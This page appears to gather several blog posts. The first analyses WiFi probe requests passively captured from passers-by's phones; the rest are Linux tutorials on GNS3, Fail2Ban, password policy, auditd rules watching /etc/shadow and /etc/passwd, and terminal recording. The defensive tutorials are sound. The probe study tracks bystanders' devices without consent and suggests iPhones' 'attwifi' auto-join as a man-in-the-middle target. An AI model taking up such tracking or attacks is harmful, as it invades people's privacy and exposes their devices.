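A sketch of that test, assuming the observation timestamps (in seconds) for one station/SSID pair are already loaded into a list; the exact statistics used by the real analysis script may differ:

import numpy as np

def is_background(timestamps, min_events=144, limit=300.0):
    # A pair is treated as background noise when it has enough observations and
    # the 95% confidence interval of its inter-observation period contains 300 s.
    if len(timestamps) < min_events:
        return False
    gaps = np.diff(sorted(timestamps))            # inter-observation periods
    mean = gaps.mean()
    sem = gaps.std(ddof=1) / np.sqrt(len(gaps))   # standard error of the mean
    return (mean - 1.96 * sem) <= limit <= (mean + 1.96 * sem)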

There is a good chance that this analysis makes some statistical assumption that is untrue. However, starting from the idea that a background station should always be observed and that a station in a vehicle is observed infrequently, it can be concluded that background stations should make up a disproportionate amount of the observed probes. The statistical method I presented identifies stations in agreement with this idea. I identified 12 stations which were responsible for 50.95% of the observed probes.

Probes by day of the week

The first thing I decided to look at was the number of probes per day of the week.

Probes per day of the week

This graph is not particularly interesting. There are more probes recorded on Friday than any other day of the week. This lines up with the idea that more people are out doing things on a Friday than any other day of the week.

Probes by hour of day

Looking at the number of probes per hour of the day is much more interesting. This is a histogram where the bin width is an hour. I chose to normalize the height of each tally by the number of days included in it. This enables the absolute height of each tally to be compared across all three graphs, even though each one does not include the same number of days.
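As a sketch of that normalization (hypothetical helper names, assuming each observation carries a Python datetime):

from collections import Counter

def probes_per_hour(observations):
    # Average probe count per hour of day, divided by the number of distinct
    # days in the dataset so differently sized datasets can be compared.
    per_hour = Counter(obs.hour for obs in observations)
    days = len(set(obs.date() for obs in observations)) or 1
    return [per_hour.get(hour, 0) / float(days) for hour in range(24)]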

Probes per hour of day

Probes per hour of weekday

Probes per hour of weekend

The second graph showing the probes per hour of the weekday is the most striking. It lines up with the idea that traffic peaks in the morning when people are travelling to work and in the afternoon when they are coming home. There is a school bus stop near my house. I’m guessing most school students also carry a cell phone, which might explain the afternoon values beginning to rise earlier than expected.

The graph for the weekend shows a strong difference from the weekday graph, with activity peaking in the middle of the day.

Stations Per SSID

The next thing I thought would be interesting would be to see how many SSIDs are shared in common by the stations observed. The first question is how many SSIDs have more than one station probing for them.

SSIDs Probed By One Station

Only 12% of the SSIDs observed had more than one station probing for them. I needed to cut down that part of the dataset even more, so I graphed just the upper quartile.

upper Quartile of SSIDs By Station Count

Each SSID is shown along with the number of stations probing for it. Most of these do not stand out very much. “Bright House Networks” is the name of a regional cable provider. “Wayport_Access” is a provider of internet access at McDonald’s.

But what exactly is “Nintendo_3DS_continous_scan_000”? It turns out to be something called StreetPass for the Nintendo 3DS. It is used by the handheld to connect to other handhelds. A good explanation of the WiFi component is found here. The handheld uses these probes as a way to announce its presence and set up what amounts to an ad hoc network. The fact that I saw 353 Nintendo 3DS handhelds is surprising to me.

I have not yet figured out what an SSID of “DIRECT-” corresponds to.

The SSID “attwifi” apparently is used by AT&T to offer wireless service to its customers in public places. Interestingly, it seems that some iPhones attempt to connect to this network even if the user does not instruct them to. This phenomenon is detailed here and here. This makes a great target for a man in the middle attack on iOS devices.

The SSIDs “linksys” and “NETGEAR” are the defaults on many home access points.

Where to go from here

At the moment, I’m sitting on this project. I believe that capturing the undirected probes will give me a much more interesting dataset.

While I was working on ideas for the background subtraction, it dawned on me that you could use the observations to measure wait time in a queue. If I had clear view of a traffic light, this would be a really neat application. Unfortunately I do not at this time.

The first 3 bytes of each station’s MAC address are assigned by the IEEE to specific manufacturers. Because of this, I essentially have access to a popularity map of device manufacturers. I am not sure what I will do with this at this time, but I think there are some interesting possibilities.
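For example, the OUI prefix can be pulled out of each recorded address and tallied against a vendor table; the sketch below assumes an oui_to_vendor dictionary has been built elsewhere (for instance from the IEEE OUI registry):

def oui(mac):
    # First three bytes of a MAC address, e.g. '00-1a-2b-c3-d4-e5' -> '00:1A:2B'
    return mac.upper().replace('-', ':')[:8]

def vendor_counts(macs, oui_to_vendor):
    # Tally observed stations per manufacturer using an OUI -> vendor dict.
    counts = {}
    for mac in macs:
        vendor = oui_to_vendor.get(oui(mac), 'unknown')
        counts[vendor] = counts.get(vendor, 0) + 1
    return counts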

Source code

I have updated the project on GitHub with the latest source code. I used the matplotlib python module to generate the graphs.

Previously I showed my first analysis of captured WiFi probes. Since then I have collected more data. Most importantly, the capture script now collects all probes instead of just directed probes. The data analysis is mostly unchanged. The background subtraction has been further tuned. The stations per SSID chart now simply shows the top 10 most popular SSIDs rather than the upper quartile.

The biggest change this dataset shows from the last is the probes per hour of weekday. There are strong peaks correlating with 8 AM and 5 PM. This agrees with my hypothesis that WiFi activity correlates with traffic patterns.

Graphs

Fraction of stations sighted more than once

Probes per day of the week

Probes per hour of day

Probes per hour of weekday

Probes per hour of weekend

SSIDs Probed By One Station

Top 10 SSIDs By Station Count

Each SSID is shown along with the number of stations probing for it.

Source code

I have updated the project on GitHub with the latest source code. I used the matplotlib python module to generate the graphs.

GNS3 – Open source software that simulates complex networks as close as possible to real networks


GNS3


What is GNS3 ?

GNS3 is open source software that simulates complex networks while staying as close as possible to the way real networks perform, all of this without needing dedicated network hardware such as routers and switches.

The software provides an intuitive graphical user interface to design and configure virtual networks. It runs on traditional PC hardware and may be used on multiple operating systems, including Windows, Linux, and Mac OS X.

In order to provide complete and accurate simulations, GNS3 actually uses the following emulators to run the very same operating systems as in real networks:

  • Dynamips, the well known Cisco IOS emulator.
  • VirtualBox, runs desktop and server operating systems as well as Juniper JunOS.
  • Qemu, a generic open source machine emulator that runs Cisco ASA, PIX and IPS.

gns3 documentation

Who can use it?

GNS3 is an excellent alternative or complementary tool to real labs for network engineers, administrators and people studying for certifications such as Cisco CCNA, CCNP and CCIE as well as Juniper JNCIA, JNCIS and JNCIE. Open source networking is supported too!

It can also be used to experiment features or to check configurations that need to be deployed later on real devices.

The program also includes exciting features, for instance connecting your virtual network to real ones or capturing packets using Wireshark. Finally, thanks to the VirtualBox support, even system administrators and engineers can take advantage of GNS3 to build labs, test network features and study for Red Hat (RHCE, RHCT) and Microsoft (MCSE, MCSA) certifications, to name a few.

More information can be found at: http://www.gns3.net/download/ and at: https://community.gns3.com/community/support/documentation/

Setup and Configure Fail2Ban on Linux


Fail2Ban

An intrusion prevention framework written in the Python programming language. It is very effective at reducing dictionary attacks because it limits the number of failed login attempts allowed against each protected service. In this example we will protect the sshd service only. The standard configuration ships with filters for sshd, Apache, Lighttpd, vsftpd, qmail, Postfix and Courier Mail Server.

Log in as the root user and enter the following command to begin the installation:

apt-get install fail2ban

Configurations

Copy the configuration file /etc/fail2ban/jail.conf to jail.local:

cp /etc/fail2ban/jail.conf /etc/fail2ban/jail.local

Edit the file jail.local:

vi /etc/fail2ban/jail.local

With the following content:

# "ignoreip" can be an IP address, a CIDR mask or a DNS host
 ignoreip = 127.0.0.1/8
 # "bantime" is the ban duration in seconds (3600 = 1 hour)
 bantime = 3600
 # "maxretry" is the number of failed attempts before a host is banned
 maxretry = 3

Email Notifications

Find the line that says destemail and add your email address:

destemail = ken.vannakk@gmail.com

Choose the default action

Find the line:

action = %(action_)s

And change it to:

action = %(action_mw)s

The action_mw action bans the offending host and also sends an e-mail notification with a whois report; the default action_ only bans. For the e-mail delivery itself, in this case we use sendmail:

 # email action. Since 0.8.1 upstream uses sendmail
 # MTA for the mailing. Change mta configuration parameter to mail
 # if you want to revert to conventional 'mail'.
 mta = sendmail

Enable SSH

Find the ssh section in the same file and adjust it to your needs:

[ssh]
enabled = true
port = ssh
filter = sshd
logpath = /var/log/auth.log
maxretry = 3

Once done, restart Fail2Ban to apply these settings:

service fail2ban restart

Let’s try to access this server via SSH with incorrect credentials three times. We will receive one notification e-mail, and the offending IP address will be unable to SSH to the server for one hour (the bantime configured above).
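
To confirm that the jail is working, you can query Fail2Ban with its client utility (a quick check; "ssh" is the jail name enabled above):

fail2ban-client status
fail2ban-client status ssh

The second command shows the filter statistics and the list of currently banned IP addresses for the SSH jail.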

How To Setup and Configure Linux Password Policy


Linux Password Policy

User account management is one of the most critical jobs of system admins. In particular, password security should be considered the top concern for any secure Linux system. In this tutorial, we will describe how to set password policy on Linux.

Preparation

Install a PAM module to enable cracklib support, which can provide additional password checking capabilities.

On Debian, Ubuntu or Linux Mint:

$ sudo apt-get install libpam-cracklib

To enforce the password policy, we need to modify an authentication-related PAM configuration file located in /etc/pam.d. The policy change takes effect immediately, without requiring a reboot.

Note that the password rules presented in this tutorial are enforced only when non-root users change their passwords, not when root does.

Prevent Reusing Old Passwords

Look for a line that contains both "password" and "pam_unix.so", and append "remember=5" to that line. This will prevent reuse of the five most recently used passwords (they are stored in /etc/security/opasswd).

On Debian, Ubuntu or Linux Mint:

$ sudo vi /etc/pam.d/common-password
password [success=1 default=ignore] pam_unix.so obscure sha512 remember=5

Set Minimum Password Length

Look for a line that contains both "password" and "pam_cracklib.so", and append "minlen=10" to that line. This enforces a minimum password length of (10 - <# of types>), where <# of types> indicates how many different types of characters are used in the password. There are four types: upper-case, lower-case, numeric, and symbol. So if you use a combination of all four types and minlen is set to 10, the shortest password allowed would be 6.

On Debian, Ubuntu or Linux Mint:

$ sudo vi /etc/pam.d/common-password

password requisite pam_cracklib.so retry=3 minlen=10 difok=3

Set Password Complexity

Look for a line that contains both "password" and "pam_cracklib.so", and append "ucredit=-1 lcredit=-2 dcredit=-1 ocredit=-1" to that line. This will force you to include at least one upper-case letter (ucredit), two lower-case letters (lcredit), one digit (dcredit) and one symbol (ocredit).

On Debian, Ubuntu or Linux Mint:

$ sudo vi /etc/pam.d/common-password

password requisite pam_cracklib.so retry=3 minlen=10 difok=3 ucredit=-1 lcredit=-2 dcredit=-1 ocredit=-1

Set Password Expiration Period

To set the maximum period of time the current password is valid, edit the following variables in /etc/login.defs.

$ sudo vi /etc/login.defs

PASS_MAX_DAYS 150
PASS_MIN_DAYS 0
PASS_WARN_AGE 7

This will force every user to change their password once every 150 days (about five months), and send out a warning message seven days prior to password expiration.

If you want to set password expiration on a per-user basis, use the chage command instead. To view the password expiration policy for a specific user:

$ sudo chage -l cyberpunk

Last password change : MAY 30, 2014
Password expires : never
Password inactive : never
Account expires : never
Minimum number of days between password change : 0
Maximum number of days between password change : 99999
Number of days of warning before password expires : 7

By default, a user’s password is set to never expire.

To change the password expiration period for user cyberpunk:

$ sudo chage -E 12/31/2014 -m 5 -M 90 -I 30 -W 14 cyberpunk

The above command will set the password to expire on 12/31/2014. In addition, the minimum/maximum number of days between password changes is set to 5 and 90 respectively. The account will be locked 30 days after a password expires, and a warning message will be sent out 14 days before password expiration.
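
As a related example (an extra step, not part of the policy above), you can force a user to change their password at the next login by clearing the last password change date with chage:

$ sudo chage -d 0 cyberpunk

At the next login, the user will be prompted to set a new password, which must satisfy the PAM rules configured earlier.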

Monitoring File Access On Linux


Monitor File Access

If you are running a mission critical web server, or maintaining a storage server loaded with sensitive data, you probably want to closely monitor file access activities within the server. For example, you want to track any unauthorized change in system configuration files such as /etc/passwd.

To monitor who changed or accessed files or directories on Linux, you can use the Linux Audit System which provides system call auditing and monitoring. In the Linux Audit System, a daemon called auditd is responsible for monitoring individual system calls, and logging them for inspection.

To install auditd on Debian, Ubuntu or Linux Mint:

$ sudo apt-get install auditd

Once installed by apt-get, auditd will be set to start automatically upon boot.

Once auditd is installed, you can configure it in one of two ways. One is to use a command-line utility called auditctl. The other is to edit the audit configuration file located at /etc/audit/audit.rules. In this tutorial, I will use the audit configuration file.
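
For reference, a single watch rule can also be added at runtime with auditctl. Below is a minimal illustration; the "-k" key is simply an arbitrary label I chose to make later searches easier:

$ sudo auditctl -w /etc/passwd -p wa -k passwd-watch

Rules placed in the configuration file, as shown next, have the advantage of being reloaded automatically whenever auditd starts.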

The following is an example auditd configuration file.

$ sudo nano /etc/audit/audit.rules

# First rule - delete all
-D

# increase the buffers to survive stress events. make this bigger for busy systems.
-b 1024

# monitor unlink() and rmdir() system calls.
-a exit,always -S unlink -S rmdir

# monitor open() system call by Linux UID 1001.
-a exit,always -S open -F loginuid=1001

# monitor write-access and change in file properties (read/write/execute) of the following files.
-w /etc/group -p wa
-w /etc/passwd -p wa
-w /etc/shadow -p wa
-w /etc/sudoers -p wa

# monitor read-access of the following directory.
-w /etc/secret_directory -p r

# lock the audit configuration to prevent any modification of this file.
-e 2

Once you finish editing the audit configuration, restart auditd.

$ sudo service auditd restart

Once auditd starts running, it will start generating an audit daemon log in /var/log/audit/audit.log as auditing is in progress.

A command-line tool called ausearch allows you to query audit daemon logs for specific violations.

To check if a specific file (e.g., /etc/passwd) has been accessed by anyone, run the following.

$ sudo ausearch -f /etc/passwd

time->Sun May 12 19:22:31 2013
type=PATH msg=audit(1368411751.734:94): item=0 name="/etc/passwd" inode=655761 dev=08:01 mode=0100644 ouid=0 ogid=0 rdev=00:00
type=CWD msg=audit(1368411751.734:94): cwd="/home/cyberpunk"
type=SYSCALL msg=audit(1368411751.734:94): arch=40000003 syscall=306 success=yes exit=0 a0=ffffff9c a1=8624900 a2=1a6 a3=8000 items=1 ppid=14971 pid=14972 auid=0 uid=0 gid=0 euid=0 suid=0 fsuid=0 egid=0 sgid=0 fsgid=0 tty=pts2 ses=19 comm="chmod" exe="/bin/chmod" key=(null)

The ausearch output above shows that chmod was run on /etc/passwd by root once.

To check if a specific directory (e.g., /etc/secret_directory) has been accessed by anyone, run the following.

$ sudo ausearch -f /etc/secret_directory

time->Sun May 12 19:59:58 2013
type=PATH msg=audit(1368413998.927:108): item=0 name="/etc/secret_directory/" inode=686341 dev=08:01 mode=040755 ouid=0 ogid=0 rdev=00:00
type=CWD msg=audit(1368413998.927:108): cwd="/home/cyberpunk"
type=SYSCALL msg=audit(1368413998.927:108): arch=40000003 syscall=230 success=no exit=-61 a0=bfcdc4e4 a1=b76f0fa9 a2=8c65c70 a3=ff items=1 ppid=2792 pid=11300 auid=1001 uid=1001 gid=1001 euid=1001 suid=1001 fsuid=1001 egid=1001 sgid=1001 fsgid=1001 tty=pts1 ses=2 comm="ls" exe="/bin/ls" key=(null)

The output shows that /etc/secret_directory was accessed (listed with ls) by the user with Linux UID 1001.

In this example, the audit configuration was placed in immutable mode (via the "-e 2" rule), which means that if you attempt to modify /etc/audit/audit.rules and restart auditd, you will get the following error.

$ sudo /etc/init.d/auditd restart
Error deleting rule (Operation not permitted)
The audit system is in immutable mode, no rules loaded

If you want to be able to modify the audit rules again after auditd is put in immutable mode, you need to reboot your machine after changing the rules in /etc/audit/audit.rules.

If you want to enable daily log rotation for the audit logs generated in the /var/log/audit directory, run the following command from a daily cron job.

$ sudo service auditd rotate
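
A minimal sketch of such a cron entry, assuming the root crontab and the standard service wrapper path on Debian-based systems:

$ sudo crontab -e

# rotate the audit logs once a day at midnight
0 0 * * * /usr/sbin/service auditd rotate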

How To Record Terminal Sessions on Linux


Record Terminal Session

There are several online services (e.g., showterm.io or asciinema.org) which allow you to record and share your terminal sessions on the web. However, if you want privacy, or want to archive the recordings locally, we recommend you try TermRecord.

TermRecord is an open-source tool written in Python, which records a terminal session into a standalone HTML file. Since the HTML-formatted output file is self-contained, anyone can replay the captured terminal session using a web browser.

Dependencies

TermRecord currently depends on the following:

  1. A version of the script command that supports recording timing information to a file (the -t option on modern Linux distributions), or ttyrec
  2. term.js — minified (YUI), and embedded in the static template; MIT License
  3. Google Web Fonts (specifically Ubuntu Mono by default) — base64 encoded and embedded in the static template; Ubuntu Font License 1.0
  4. Jinja2 — Python templating engine; BSD License

Install TermRecord

TermRecord is available as a Python package, so you can install it with the pip command.

First, install pip on your Linux system. Then, install TermRecord as follows.

$ sudo pip install TermRecord

Usage

Just getting started? The defaults are probably fine for you; just specify an output HTML file and go: TermRecord -o mysession.html. For more complex operations, check out TermRecord --help.

There are three main modes of operation: (1) wrap the script program and dump JSON to stdout, (2) wrap the script program and dump HTML to stdout, or (3) parse script log files with timing information, saving the output (JSON or HTML) to a file or dumping it to stdout. The last mode is useful for converting old script sessions to HTML or JSON.

Recording a terminal session with TermRecord is easy. Simply run the command below to start recording.

$ TermRecord -o /path/to/output_html

Any subsequent commands typed in the terminal will then be saved to the output HTML file. The output file also stores timing information, so that the whole terminal session can be replayed at the same speed at which it was typed.

If you want to stop the recording, simply type “exit” and press ENTER.

If you open up the HTML output on a web browser, you can play, pause or restart the stored session. You can also adjust the replay speed, i.e., speed up or slow down the session replay as you like.

Demos

A selection of demos showing off the capabilities of TermRecord across a variety of shell sessions is available on the project page linked below.

More information can be found at: https://github.com/theonewolf/TermRecord